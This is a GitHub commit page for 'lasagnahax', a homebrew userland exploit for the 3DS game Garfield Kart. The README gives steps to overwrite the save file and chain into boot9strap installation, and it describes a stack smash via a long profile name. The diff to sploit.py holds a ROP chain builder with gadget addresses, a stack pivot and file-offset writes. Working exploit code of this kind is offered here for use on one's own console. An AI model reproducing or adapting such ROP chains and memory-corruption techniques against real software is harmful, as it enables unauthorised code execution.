Readme and cleanup

zoogie · May 2, 2021 · d0ec5ba · d0ec5ba
1 parent ea547e0
commit d0ec5ba
Show file tree

Hide file tree

Showing 3 changed files with 24 additions and 40 deletions.
diff --git a/Garfield.sav b/Garfield.sav
diff --git a/README.md b/README.md
@@ -1 +1,19 @@
-# lasagnahax
+# lasagnahax
+- Secondary userland exploit for Garfield Kart EU and US
+
+# Thanks
+- Tuxsh for mentioning the exploitability of this title on discord. 
+- Tuxsh [Universal Otherapp](https://github.com/TuxSH/universal-otherapp)
+- Yellows8 [3ds_ropkit](https://github.com/yellows8/3ds_ropkit)
+
+# Directions
+0) These directions are intended for experienced 3DS homebrew users only. There are more convenient exploits at https://3ds.hacks.guide for the general public.
+1) Copy the Garfield.sav release file and overwrite your current save file of the same name. Checkpoint and JKSV can do this. This will erase your save data.
+2) Set up [SafeB9SInstaller](https://github.com/d0k3/SafeB9SInstaller/releases) to your SD card. The SafeB9SInstaller.bin file needs to be on the SD root.  
+3) Make a boot9strap folder and put [boot9strap.firm](https://github.com/SciresM/boot9strap/releases/tag/1.3) and boot9strap.firm.sha inside of it.
+4) Boot the game and a. tap the lower left icon b. tap garfield's head (not the X beside his head) c. tap the gear icon. This should load universal-otherapp and then safeB9SInstaller.
+5) Proceed with installing boot9strap. You know what to do next since you're the experienced user noted in step 0.
+
+# Exploit
+
+Stack smash via long profile name string in savegame. <br>
diff --git a/sploit.py b/sploit.py
@@ -8,7 +8,7 @@
 POPPC=0x00114aec
 POP_R0PC=0x0015be1c
 POP_R1PC=0x00151650
-POP_R0R4PC=0x0010974c #: pop {r0, r1, r2, r3, r4, pc}
+POP_R0R4PC=0x0010974c
 ROP_STR_R0TOR1=0x0013b098
 
 FILE=0x00230800
@@ -23,26 +23,11 @@
 OPEN=0x001521f8+4
 READ=0x0011df78+4
 
-SP=0x0ffffcb8 # address of ropkit in bss
-#SP=ARCH-6
+SP=0x0ffffcb8 # address of initial rop on stack
 PC=POPPC
 
-READOP_FIX=0x00121c88
-TERM_FIX=0x0015b480
-#0x0015b480 : mov r0, #0 ; str r0, [r4] ; pop {r4, pc} ;
-#0x00121c88 : mov r1, #1 ; str r1, [r0] ; bx lr
-#0x00132d10 : mov r0, lr ; pop {r4, r5, r6, r7, r8, sb, sl, pc}
-#0x001469e0 : str lr, [r0, #0xc] ; pop {pc} "in deep development on a number of key projects"
-#0x0015e8a0 : str lr, [r0, #4] ; nop ; pop {r4, pc}
-#0x001007bc : ldmdb r6, {r0, r2, r5, r6, ip, sp, lr, pc} 
-
-
-'''
-with open("payload.bin","rb") as f:
-	ropkit=f.read()
-with open("otherapp.bin","rb") as f:
-	otherapp=f.read()
-'''
+READOP_FIX=0x00121c88 # : mov r1, #1 ; str r1, [r0] ; bx lr
+TERM_FIX=0x0015b480   # : mov r0, #0 ; str r0, [r4] ; pop {r4, pc} ;
 
 def write32(gadget_addr, file_offset):
 	global filename
@@ -111,23 +96,4 @@ def rop(gadget_addr):
 rop(	DEST+0x2e0)
 rop(POP_R1PC)
 rop(	POPPC)
-rop(STACK_PIVOT)
-'''
-rop(POP_R0PC)
-rop(	FILENAME-4)
-rop(POP_R1PC)
-rop(	POPPC)
-rop(STACK_PIVOT)
-'''
-
-
-
-
-'''
-write32(LEVEL_ADDR, 0x1CC, "0a")
-
-write32(JUMP_ADDR, 0x1720, "0")
-write32(STACK_PIVOT, 0x171C, "0")
-write32(SP, 0x1738, "0")
-write32(PC, 0x1740, "0")
-'''
+rop(STACK_PIVOT)